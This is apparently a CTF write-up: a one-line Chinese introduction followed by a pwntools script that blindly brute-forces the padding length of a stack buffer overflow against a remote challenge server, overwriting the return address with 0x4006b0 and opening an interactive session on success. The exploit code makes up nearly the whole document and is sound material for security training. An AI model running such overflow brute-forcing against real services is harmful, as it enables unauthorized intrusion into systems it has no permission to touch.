题目没有提供可供分析的二进制文件，因此采用暴力破解的方式。
import threading

from pwn import *
#context(os='linux', arch='i386', log_level='debug')
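def find():
    """Search for the padding length that makes the CTF service answer.

    No binary was supplied with the challenge, so the offset to the saved
    return address is unknown. For each length ``n`` from 1 to 0x400 the
    function opens a fresh connection, waits for the ``>`` prompt and sends
    ``n`` filler bytes (0x11) followed by 0x4006b0 packed as a 64-bit value.
    If a line comes back, ``n`` is printed in hex and the session is handed
    to the terminal; if the peer closes the connection (EOFError), the next
    length is tried.

    NOTE(review): the write-up does not say where 0x4006b0 comes from;
    presumably it is a fixed code address in a non-PIE x86-64 binary --
    confirm against the challenge. A blind search like this only works when
    that address is stable and no stack canary stops the overwrite, and it
    appears server-side as a burst of short connections with payloads that
    grow by one byte each time.
    """
    worker = threading.current_thread().name
    print("thread %s is running..." % worker)
    n = 0x0
    while n < 0x400:
        n = n + 1
        print("thread %s>>>%s" % (worker, n))
        sh = remote("220.249.52.134", 53525)
        payload = p8(0x11) * n + p64(0x4006b0)
        try:
            # The prompt wait sits inside the try as well: a peer that hangs
            # up before printing ">" should count as a failed attempt, not
            # kill the worker thread.
            sh.sendlineafter(">", payload)
            sh.recvline()
        except EOFError:
            continue
        else:
            print("repeat time is %x" % n)
            sh.interactive()
            break
        finally:
            # Close every tube, including failed ones; the original leaked
            # one socket per wrong guess (up to 0x400 of them).
            sh.close()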
if __name__ == '__main__':
    # Run the search in one worker thread and block until it has finished
    # (either a length was found or every candidate was tried).
    worker = threading.Thread(target=find)
    worker.start()
    worker.join()